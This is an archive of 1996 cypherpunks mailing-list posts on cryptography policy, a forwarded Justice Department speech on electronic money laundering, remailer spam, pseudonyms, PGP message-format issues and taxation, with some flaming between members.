> >means that you have to make the trip, and write down all of the above with a
> >referring codeword or number.
> >Cheap, I know.  Wonder if this type of "one time pad" is as foolproof as
> >truly randomly generated ones.
> 
> You needn't wonder. These are not one time pads. Read any opening chapter
> of any book on crypto to see why.
> 
> However, there might be a good company you could put together around this idea.
> 
> (I wonder why nobody has thought of something so easy....)
> 
this was proposed a couple months ago by a Robert Shueey, he first posted 
asking if "Irrational=Random".
not sure if he got any responses. 

> 
> --Tim
> 
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 13 Nov 1996 08:12:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <v03007801aeae80c47f21@[207.167.93.63]>
Message-ID: <v03007800aeafa43b5167@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM -0500 11/12/96, Jim Wise wrote:
>On Tue, 12 Nov 1996, Timothy C. May wrote:
>
>> My piece was written as a rant about the dangers of the proposed talk of
>> "privatizing food distribution points," about how this would result in a
>> system where only the rich could get access to nutritional food, and how
>> the poor would be made to suffer. And how this "caloric anarchy" would
>> result in vicious monopolies, price wars, and deviation from Recommended
>> Governmental Caloric Intake Rules.
>
>Which it does...  FWIW, I tend to agree with your general point, but I
>moved from downtown Manhattan to Harlem recently, and was surprised to see
>how many foodstuffs cost _more_ up here, as well as the obvious fact that
>many are harder to get...  Junk food and cheap liquor are everywhere,
>though...

But you're conflating a separate issue: the cost of doing business in
high-crime ghettoes. Both rich and poor alike find prices high and
selection poor in high-crime ghettoes. Likewise, both rich and poor alike
find prices low and selection good in low-crime, suburban locales.


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 Nov 1996 06:47:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Litt: 10/28 speech to ABA/ABA
Message-ID: <v03007817aeaf7c3419db@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@tiac.net
Date: Tue, 12 Nov 1996 17:46:02 -0500
To: Digital Commerce Society of Boston <dcsb@ai.mit.edu>
From: The Old Bear <oldbear@arctos.com>
Subject: Litt: 10/28 speech to ABA/ABA
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: The Old Bear <oldbear@arctos.com>

 < gopher://198.80.36.82:70/00s/current/news/topic/econ/96102905.lec >


*96102905.LAR 10/29/96

FIGHTING ELECTRONIC MONEY LAUNDERING DEMANDS MULTI-PRONGED STRATEGY

(Byliner by DAAG Robert S. Litt)  (1930)
By Robert S. Litt


Most observers believe that widespread electronic commerce is probably
inevitable. It offers us the exciting prospect of doing away with many
of the costs, burdens, and problems associated with paper money. But
the advent of electronic commerce presents certain challenges to law
enforcement as well.

One of the biggest challenges is the new opportunities for criminals
to launder their dirty money. Traditionally, money launderers have
deposited troublesome and bulky cash proceeds into banks or other
financial institutions to obscure its criminal origins. Or they have
created phony companies, or engaged in sham transactions, to hide
illicit profits.

These methods usually create paper trails that can be traced by law
enforcement. Through education, training and the enactment of
stringent laws and regulations in this regard, and through close
cooperation between the Departments of Treasury and Justice, law
enforcement has made great progress preventing and detecting money
laundering. As a result, it is increasingly difficult for criminals to
launder their money successfully.

But certain types of electronic commerce systems permit virtually
anonymous transactions and leave no paper trail. These systems could
undo years of hard law enforcement work. Electronic commerce could
allow a money launderer who wants to transfer tainted funds to do so
without the risk of engaging in personal contact with a potentially
suspicious bank employee. And the funds could be transferred anywhere
in the world by an automated on-line banking system that could be
accessed from the safety of the money launderer's home.

Similarly, a bank that operates completely on-line could court the
business of money launderers with little danger of prosecution. Such a
virtual bank could easily be located overseas, beyond the reach of
U.S. law enforcement. A recent article in the Washington Post suggests
that we are already encountering offshore, on-line banks. According to
the Post article, one offshore bank describes itself as the first bank
on the Internet, offering the opportunity to open accounts, wire
money, order credit cards or write checks by computer from anywhere in
the world, around the clock.

The bank's Worldwide Web page describes the benefits it offers to
customers: "Since there are no government withholding or reporting
requirements on accounts, the burdensome and expensive accounting
requirements are reduced for you and (the bank). The bank maintains
the strictest standards of banking privacy in offshore business and
financial transactions. Indeed, (the bank's country) has stiff
penalties for officers or staff that violate banking secrecy laws." It
is not hard to imagine who will be attracted to this kind of banking.

Some smart card systems go further, and would permit money launderers
to obscure the origins of funds while avoiding financial institutions
entirely. These systems have no central registry of transactions which
would allow the transactions to be reconstructed. A sophisticated
launderer, using multiple cards, could create an intricate series of
transfers that could not be unraveled, and that would circumvent
almost all existing money laundering laws. Internet payment systems
can similarly permit multiple transactions that could be next to
impossible to trace, particularly if unscrupulous merchants cooperate
with the criminals.

How do we respond? One big step toward eliminating money laundering
and other law-breaking through electronic commerce would be to
implement electronic cash technologies that track all transfers. We
have received information that at least one provider of a smart card
system that is already in use in Europe has modified its cards for use
in the United States so that financial institutions will be able to
track card usage. The system will allow them to audit for fraud, if
not recreate every transaction.

But a solution such as this raises a fundamental philosophical issue
for our society -- striking the proper balance between anonymity and
accountability. This question is being debated in many contexts as the
Internet grows. Important reasons abound to allow anonymity in
communications networks. Whistleblowers may want to remain anonymous
to avoid retribution. Consumers may wish to obtain information on a
product without ending up on hundreds of mailing lists. Rape victims
may want to discuss their experiences without revealing their
identities.

Unfortunately, criminals also benefit from anonymity. They want to
avoid getting caught. Anonymous remote communications can help them
avoid detection and apprehension. And so effective law enforcement
requires accountability. We must be able to hold individuals who harm
others accountable for their conduct.

We can find a middle ground between anonymity and accountability in
the principle of confidentiality. In a confidential system, a person's
identity is not generally known, but in appropriate circumstances --
for example when a court order is obtained -- the identity can be
determined. Confidentiality permits us to allow anonymity in
appropriate circumstances but does not permit criminals to obtain new
advantages from the anonymous capabilities of the Net.

This concept of confidentiality embodies the message chosen by the
framers of the U.S. Constitution to limit law enforcement through the
Fourth Amendment. They rejected a system under which law enforcement
could have unfettered access to citizens' papers; but equally they
rejected a system where those papers could be immune from scrutiny
under any circumstances. Rather, they provided for access to a
person's documents under appropriate judicial supervision, forbidding
unreasonable searches and seizures and requiring warrants and
subpoenas. The same kind of balancing, an approach that protects both
anonymity and accountability, should govern our approach to electronic
cash.

Those are some of the challenges we will face. The Department of
Justice has been taking some steps to help us prepare for these
challenges, drawing on the expertise we have had in dealing with other
computer crimes such as hacking.

The first lesson that we have learned is the need for extensive
training. To fight computer crime, agents and prosecutors must
understand computer and telecommunications technology, and be
dedicated full time to this complex area of law. The FBI has now
created three computer crime squads, in Washington, San Francisco and
New York City. The Secret Service also has agents trained to deal with
electronic crimes against financial institutions. The expertise of
these agents will be a crucial asset in fighting abuses of electronic
commerce.

Successful investigation of high-technology crime also requires the
participation of technically literate prosecutors. In 1991, the
Criminal Division of the Department of Justice created what is now the
Computer Crime and Intellectual Property Section, which we have
recently doubled in size. And we have set up, with the cooperation and
support of our U.S. attorneys nationwide, a network of prosecutors who
have been specially trained to serve as Computer and
Telecommunications Coordinators. These "CTCs," as they are known,
presently serve as resident experts on computer crime issues.

But to be successful in combating money laundering or any other form
of electronic crime, an international response is absolutely
necessary. Many of the crimes of the future will not be hampered by
international boundaries, because electronic funds need not be
physically transferred; they can be instantaneously and covertly
shipped via telephone and data networks.

Because computer criminals often are not in the same country as the
electronic funds that they are stealing, passports and other existing
international controls are of limited use in identifying and
apprehending them. Thus, a concerted international effort will be
necessary to ensure that electronic commerce criminals cannot take
advantage of weak laws in one country to commit crimes with impunity
in the United States.

We are making great progress in this effort. We have already had
several instances of international cooperation leading to the arrest
of overseas hackers who have broken into U.S. computers, and we are
working in a number of international forums to institutionalize that
cooperation and to seek coherent rules and policies that will enable
us to prevent abuses of electronic commerce.

In addition to working with other governments, we will have to work
with industry. The issue of encryption is particularly prominent now.
Without strong encryption, successful electronic commerce is probably
a fantasy. But encryption that is too strong -- that cannot be broken
when appropriate -- risks terrible and irrevocable damage to law
enforcement capabilities that are critical to our ability to protect
us all. Our goal is to encourage the use of strong encryption to
protect privacy and commerce, but in a way that preserves law
enforcement's ability to protect public safety. We're not looking to
expand what we can do now, just to preserve this ability against the
threat of unbreakable encryption. Our goal is confidentiality --
protecting the privacy of individual communications while preserving
our present ability under the law to obtain this information when we
need it.

Similarly, in electronic commerce, we want to work with industry to
ensure that the needs of law enforcement are met without either
stifling the development of a vibrant new technology or compromising
individual rights. We believe that the electronic commerce industry
should incorporate certain features into the designs of their smart
cards systems, features that we consider necessary to avoid abuses in
this area. We don't want to dictate how these features are designed,
but there are certain reasonable elements that industry should build
into its systems.

First, a transaction using a digital purchasing system should generate
and safely store records similar to those of credit cards whenever a
cardholder makes a purchase or transfer that exceeds a designated
size. In this regard, we must again emphasize that we are not seeking
to give government any new authority, merely to ensure that we can get
information when we are authorized to do so. Second, electronic
commerce systems should be designed to maintain sensible limits on the
amount of value that may be stored or transferred on a single smart
card or personal computer. Few people carry tens of thousands of
dollars in cash on their persons; permitting "smart cards" of such
value would greatly increase the opportunities for fraud. Finally, and
for obvious reasons, we must encourage the major smart card system
providers to use responsible financial entities as the primary outlets
for their cards.

Our last challenge is to update laws that might otherwise become
outdated. At present it is not clear whether our existing laws are
adequate to deter and punish electronic commerce abuses. Since
Congress did not and could not have foreseen the current electronic
commerce revolution, law enforcement authorities must be prepared, at
least at first, to combat these abuses through existing criminal
statutes that are not perfectly adapted to the problem.

We do not want to create new laws for their own sake, and certainly
not without understanding the effects that they would have on a
vibrant new industry. On the other hand, if we find that the law
enforcement problems presented by electronic commerce are outstripping
our ability to deal with them, changes in our legal structure may be
required.

The challenges faced by law enforcement in electronic commerce will be
enormous. We have already begun to prepare for some of these
challenges, but we realize that we have much more to do. With
training, technological understanding, international cooperation,
diligent law enforcement, and the cooperation of industry, we will
meet these challenges.

(Mr. Litt, a deputy assistant attorney general, is President Clinton's
nominee to head the Justice Department's Criminal Division. The
article was adapted from his Oct. 28 speech to the American Bar
Association and the American Bankers Association in Washington. It is
in the public domain and may be reprinted without permission.)


NNNN

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 13 Nov 1996 06:47:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Perceptions and Misperceptions of Privacy on the Net"
Message-ID: <v0300781aaeaf7d074b48@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@tiac.net
Date: Tue, 12 Nov 1996 19:59:39 -0500
To: Digital Commerce Society of Boston <dcsb@ai.mit.edu>
From: The Old Bear <oldbear@arctos.com>
Subject: "Perceptions and Misperceptions of Privacy on the Net"
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: The Old Bear <oldbear@arctos.com>

                  The George Washington University
             School of Engineering and Applied Science
                    Cyberspace Policy Institute

                    FREE AND OPEN TO THE PUBLIC

                Tuesday, November 19, 1996 4-6 p.m.
      Room 410 Marvin Center, 21st & H St. NW, Washington, DC

       "PERCEPTIONS AND MISPERCEPTIONS OF PRIVACY ON THE NET"

                             Speaker:
          Steven Emmert, Corporate Counsel for Lexis-Nexis

                          Commentators:
   William W. Burrington, Assistant General Counsel, America Online
  Deidre Mulligan, Staff Counsel, Center for Democracy and Technology

   Privacy norms, regulations, and laws have been developed over the
years, in balance with norms, regulations and laws governing access to
government information and open meetings. The advent of widespread
Internet use has called into question some previously unchallenged uses
of information, reopened discussion on some problems once thought
resolved, and raised new questions which have never been addressed.
In addition to the commercial players involved, individuals, in greater
numbers than at any time in the past, have joined these discussions
about the proper uses of information.
   LEXIS-NEXIS recently experienced this increased individual
participation first hand following the release of a commercial product,
P-TRAK. This product, which makes limited information about individuals
available to LEXIS-NEXIS' subscribers (typically law firms, Fortune 1000
corporations, and government agencies including federal law enforcement
agencies) became the centerpiece of an Internet controversy about privacy.
Information and misinformation about P-TRAK was widely disseminated on
the Internet (and still is) and in the mainstream media.
   In response to this controversy, the Congress directed the Board of
Governors of the Federal Reserve System, in consultation with the
Federal Trade Commission, to conduct a study of whether organizations
which are not subject to the Fair Credit Reporting Act are engaged in the
business of making sensitive consumer identification information available
to the general public. Senators Bryan, Pressler, and Hollings have
requested "that the FTC conduct a study of possible violations of consumer
privacy rights by companies that operate computer data bases."
   As these studies proceed it will be important for all concerned
-- corporations, individuals, the government, law enforcement and
others-- to ensure they fully understand the issues and policies involved
in order to strike the proper balance between the legitimate information
needs of businesses, professionals, individuals, the press, the public,
government and law enforcement, and an individual's right to privacy.
   Lessons learned from this experience will be shared. The policy and
legal issues raised will be identified. Implications for the future of
the Internet and for electronic commerce in information will be discussed.

    Additional information on this and other seminars is available at
          www.cpi.seas.gwu.edu/Activities/Seminars/96-97.html





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Wed, 13 Nov 1996 08:34:23 -0800 (PST)
To: "Mullen Patrick" <cypherpunks@toad.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <v02140b00aeafa0bb0e9f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:34 AM 11/13/1996, Mullen Patrick wrote:
> Sounds like another attempt to raise the cost of using the Net, nothing more.

I am curious which conspiracy you believe I am participating in, other
than the Great Cypherpunk Conspiracy, that is.

Keep in mind that nobody is forced to participate.

> Sure, paying postage (Is $1 really necessary?  Why email when snailmail's
> cheaper??) may reduce general spamming done by local punks, but it does
> nothing
> against corporations which already spend millions on snailmail spamming.

Many people would be happy to read spam mail at $1 a piece.  Assuming you
can scan at a very conservative 3 messages/minute, that's $180/hr. you
can make in the privacy of their own home.

Not enough for you?  Raise the rate.

One dollar is a nice schelling point.  That's why I chose it for my
example.  In practice the people involved are welcome to choose any
amount in any currency they like.

> Also,
> what happens when your long-lost friend comes across your addy and tries to
> email you?  Surely you don't want to charge postage for an otherwise free
> service to him/er.  Maintaining a list of "accepted sources" would be a hassle
> not many people would accept.

Absent highly intrusive global net monitoring techniques, that's what they
are going to have to do anyway.  E-mail is inexpensive.  The advertiser
can justify the expense even if generates a small number of leads.  Expect
more spam.

The alternative to filtering the mail in some way is to create Internet
licenses for every participant which may be revoked for infractions.
These licenses would have to be global.  Big Brother is Watching.

Advertisers do not have a monopoly on spam.  Many people - especially
women - complain about harrassing mail they receive.

> Slight variation is to generate a list of "toll these entities."  A smaller
> list
> (hopefully :-), and generally easier because then it defaults to no-bill.  Or,
> to accomodate superstars/actors/etc, generate files like rhosts.accept
> rhosts.deny in UNIX.  That way, the user may use either/both types of
> filtering.

How will you construct your "toll these entities" list yet accept mail from
any remailer?  Why will spammers not figure out remailers?

> Again, the average user wouldn't want to deal with this hassle, everyone's
> mail
> software would have to be rewritten, and I basically oppose any ideas that
> cost me money for something I already get for free...  :-)

No, everybody's mail software would not have to be rewritten.  That was
the idea.  For instance, it would be easy for users of Unix systems to
use procmail to pre-filter their mail for whatever program they like.
Nota bene: the remailer operator is not offering to filter the users
mail.

"Free" is not always the best choice.  I would gladly pay $10/month to
receive the cypherpunks list if it meant that messages were delivered
immediately when sent.  (I believe these delays hamper the discussion.)
As it is, I can't complain because I am a recipient of John Gilmore's
charity.

I would be interested to hear more about your solution to this problem:
People spam other people who don't like spam but like to receive anonymous
messages.

I would prefer to see solutions in keeping with the Cypherpunks spirit;
that is, no use of force, no use of law, and no loss of anonymity will
be acceptable.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Nov 1996 08:11:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UNSUBCRIBE CENSORSHIP
In-Reply-To: <v03007801aeaeb75a4ae7@[207.167.93.63]>
Message-ID: <sZ4BXD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> At 5:12 PM -0330 11/12/96, Sheldon Andrews wrote:
> >UNSUBCRIBE CENSORSHIP
> 
> You dumbass.

Let's see if John Gilmore pulls Timmy May's plug for namecalling...

> 
> This is not "CENSORSHIP"...whatever you had in mind, no such mailing list
> is copied in your "To:" or "cc:" field.

That's right - this mailing list is being censored by John "Hitler-like leader"
Gilmore, but it has a different name to distinguish it from other censored
mailing lists.
> 
> Secondly, "unsubscribe" is not spelled "UNSUBCRIBE."
> 
> Thirdly, send your unsubscribe commands to the appropriate place for the
> list involved, not to the list itself.
> 
> Sheldon Andrews is hereby added to the "Don't Hire" list. Hope you weren't
> planning to apply for work out here.
> 
> --Tim May

(Who hasn't worked for a living years)


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Wed, 13 Nov 1996 00:52:11 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=Cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: FW: Returned mail: User Unknown
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961113085327Z-4263@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain


Can whoever is responsible for this please stop.

This is about the 30th one that I have received.

Thanx
Scott


>>The address you mailed to is no longer valid.
>>This is probably because the user in question was an
>>old Open Net subscriber. Open Net is NO LONGER an ISP,
>>and has not been since May 1996.
>
>>We have no redirection address for that user. Please
>>remove them from any mailing lists you might have.
>
>>This response was generated automatically.
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Wed, 13 Nov 1996 09:30:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: So how does the crypto crackdown go?
Message-ID: <199611131727.JAA10271@crypt>
MIME-Version: 1.0
Content-Type: text/plain


From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
> As Hal knows, but some newer members of the list may not, I discuss the
> possibility of a ban on strong (unescrowed) crypto at some, ahem, length
> in
>
> http://www.law.miami.edu/~froomkin/articles/clipper.htm
>
> Although the article is more than 18 months old, the law hasn't changed
> in any material way as far as I know.
>
> Bottom line: they probably can't do it under the constitution, but it's a
> closer call than it should be.

This is a very helpful and thorough analysis.  However it does not address
the possibility of a ban on the sale/distribution of strong crypto, rather
than a ban on its use.

There are several reasons why I think the former is more likely:

 - PRECEDENT FROM ITARS
   The current bans on export of encryption software limit the distribution
   of the software itself, not of encrypted messages.  Extending this ban
   to domestic distribution would imply banning distribution but not use
   of crypto software.

 - NOT A PRIVACY ISSUE
   The privacy issues would be much less relevant because it is no longer
   a matter of just what you do in the privacy of your own home.

 - OUT OF THEIR OWN MOUTHS
   The Clinton administration's original veiled warning, quoted in
   Michael's paper, denied that "every American, as a matter of right,
   is entitled to an unbreakable commercial encryption product."  Noting
   the use of "commercial" this suggests a ban on sales rather than
   use.

 - COMMERCIAL REGULATION
   Not being a lawyer, I can only speculate that the interstate commerce
   clause would give more justification for a ban on distribution than on
   use.

 - FOOT IN THE DOOR
   Conceivably such a ban, if successful, would provide new arguments for
   advancing to the second stage of a ban on usage after some time.
   The impact of the usage ban would be less due to the lack of access
   most people would have to such software, and the (arguably) demonstrated
   effectiveness of the government approved software almost everyone would
   be using by that time.

 - BIG BROTHER IS WATCHING
   We have long speculated that the government's real interest is in
   making mass surveillance more practical, with the stated concerns about
   criminals being merely a convenient cover.  Commercial restrictions
   would be consistent with such motives since they would have more
   impact on the innocent many than the motivated few.

A ban on sales and distribution could still be opposed on First Amendment
grounds, especially if it becomes established that software is speech.
Still there are many restrictions possible on commercial speech so even
a favorable precedent in this area would not preclude some regulation of
software distribution.

We could also argue that such a ban is de facto equivalent to restrictions
on use, since most people would not then have access to privacy preserving
software.  In that case the many excellent arguments which Michael brings
forward to oppose such restrictions would be relevant.

And what would be the implications for freeware crypto?  Could
distribution of such software be subject to regulation in the same way
as commercial programs?  Then there are the issues relating to speech
about crypto which are currently being litigated.  Presumably domestic
restrictions on such speech would have to reach a much higher standard
of demonstrated need than restrictions on export.

For these reasons I think that domestic regulations on the sales
and distribution of strong crypto would not be a sure thing for the
government, but would be a lot easier for them than restricting use.
This suggests that it is a likely direction for them to take after the
next terrorist attack.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 13 Nov 1996 09:35:55 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611130331.TAA28661@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.91.961113091632.16315A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 12 Nov 1996, Larry wrote:

> actually, there are some amusing things going on here with cpunk
> "rules." are cpunks in favor of pseudonyms or not? one famous
> cpunk madman wrote under a pseudonym to the list, and many
> cypherpunk went to great lengths to try to derive his identity.
> is this a case of respecting pseudonyms? or is it more a case of
> the double standard at best, hypocrisy at worst, 
> "respect my pseudonyms, but yours are fair game"?  

In general, Cypherpunks promote the ABILITY to use pseudonyms.
"Respect pseudonyms" (whatever that means), is clearly a separate
issue.  In fact, by trying to "bust" a pseudonym, C'punks are
contributing to evolution in action.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 13 Nov 1996 00:50:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: [URGENT] Accounts payable
Message-ID: <199611130850.JAA11763@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


What a joy to make a public mockery of Tim 
Mayonnaise!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Tue, 12 Nov 1996 14:52:56 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <2.2.32.19961113195012.0076c010@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir,

>>problem avoiding the photo (and thumbprint) on the license.

You mean you guys have to have a thumbprint on your drivers licences as
well? That is a real entry into the system! Appearances can be changed, but
fingerprint changing isn't quite as easy for the average Joe.

But who was it who said: "How can you convince people of the need for
privacy when they are willing to leave detailed records of their shopping
habits for 1/10000th of a flight to somewhere"? 
I think it may have been Mr.Schneier in his article on why Cryptography is
difficult, I can't remember, but it definitely has the ring of truth to it.

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Wed, 13 Nov 1996 09:58:20 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Re: pgp3
In-Reply-To: <199611131217.NAA19213@internal-mail.systemics.com>
Message-ID: <328A0B7F.68B00890@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland wrote:
> Raph Levien wrote:
> > Nope. This RFC is merely a rehash of the pgformat.doc file in the PGP
> > 2.6.? distribution. I'm doing an independent implementation of the PGP
> > 2.6 message formats, and found this document unclear in a few spots. For
> > example, can anyone else figure out the weird CFB variant mode from this
> > document? I used a debugger on the PGP code to help me figure it out.
> 
> Exactly - I spent ages on the same thing.  Then there's the problem that
> packet length headers must be specific lengths for various types (eg.
> key certificates must have a 2 byte length, even if only one is required).
> It is also not clear what the exported key certificates should contain,
> the spec simply mentioning that there should be no trust packets etc. etc.

Right.

> > The PGP 3.0 "spec" that you're referring to is actually a draft for a
> > PGP library API. A couple of those got circulated on some PGP mailing
> > lists, but none have been publicly released, another example of the
> > secrecy surrounding the whole PGP effort.
> >
> > Now that PGP Inc. is happening, it's not exactly clear whether the PGP
> > 3.0 release is going to include an API closely resembling these drafts.
> 
> I agree with your comments.  For example, we are developing PGP compatible
> libraries in both Perl and Java, and are going to add SHA, Blowfish, T-DES,
> etc., along with a better key ring format, encrypted key rings, and features
> such as key generation from a passphrase, and we would very much like to
> remain compatible with the new PGP, but how can we when there is so little
> information available?  I think we need a forum to discuss PGP development
> issues - I would be happy to set one up if there was interest.

I'd be interested.

There's a few extensions I'm interested in, as well. One of the things
I'd _really_ like to see is a standardized, cryptographically strong
naming system for PGP keys. Derek Atkins and I threw around a proposal
(the SHA-1 hash, in hex, of the public key packet, including the packet
headers, with the length field in the packet header constrained to 2
bytes), but I'm not sure where that's headed.

The 8-byte key id is perhaps the biggest mistake in the PGP message
formats. I'm finding that it adds considerable complexity into the
message format code. For example, to check a signature, it's necessary
to iterate RSA exponentiation over all keys that match the key id. In
almost all cases, there will be only one such key, but to protect
against dead beef attacks, you have to do it.

In PGP 2.6.?, it's possible to exploit dead beef as a denial of service
attack. As soon as you add one public key with a given key id, it
prevents other keys with the same key id from being added. Thus, if I
were to create a key with key id 657984b8c7a966dd, and convinced other
people to add it to their keyrings, they wouldn't be able to add Phil
Zimmermann's key.

Knowledgeable users can get around this (for example, by deleting the
bogus key), but most people, especially those using automated tools,
would have trouble.

Of course, the main "extension" to PGP I'm interested in is a new trust
model and distributed database for certifying keys. However, at least
for the prototype, this can be implemented entirely on top of PGP (or
S/MIME, I think), so we don't need to talk about modifying the PGP
engine for this.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 13 Nov 1996 07:04:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Taxation Thought Experiment
Message-ID: <9610138479.AA847908262@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



>azur@netcom.com (Steve Schear) wrote:
>>The crypto-relevance is via crypto anarchy: we need to undermine the tax
>>system enough that _everyone_, not just us, loses faith in it.
>>
>>--Tim May
>>
>
>I've posed similar questions to friends and aquaintences.  The
>working-class stiffs (who can't easily hide from the IRS) feel taxes are an
>unwelcome but necessary burden in order to provide the blanket of
>government protection they feel exists.  They resent and oppose widespread
>tax fraud.  Self-employed tend to be more open to 'alternative' income
>structuring.
 
And in the meantime, it would seem prudent to use the existing system to maximum
advantage. In Canada, you can set up a personal trust called a Registered
Retirement Savings Plan (similar to an IRA?) wherein you can trade securities
without tax liability until you withdraw the money into your hands. As long as
you aren't trying to spend it, no taxes are owing. There is a withholding tax of
25% if you eventually leave the country, but the tax free compounding effect
over a decade or two will make this virtually irrelevant.
 
There are also tax credits for venture capital (especially if it relates to R&D)
or scientific research investments. Since we are in fields that likely are
related to this type of work, it seems that we would be able to take advantage
of these types of credit. In Canada, they can pay 80-90% of the related payroll.
Add NRC (National Research Council) grants available for R&D projects and you
can run a company with a dozen people for NO money.
 
This is not fantasy since I know at least two companies that do this. The only
caveat is that you need a good idea to start with. It is also not hard to have a
nominal 50+% marginal tax rate yet pay 15% net income taxes. Since I can use the
Canadian tax system to advantage, I'm not sure that I want to get rid of it just
yet.
 
So, while you are waiting for that anarchy, you may want to retain a good tax
accountant.
 
Ciao,
James
 
The grass is always greener over the septic tank.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
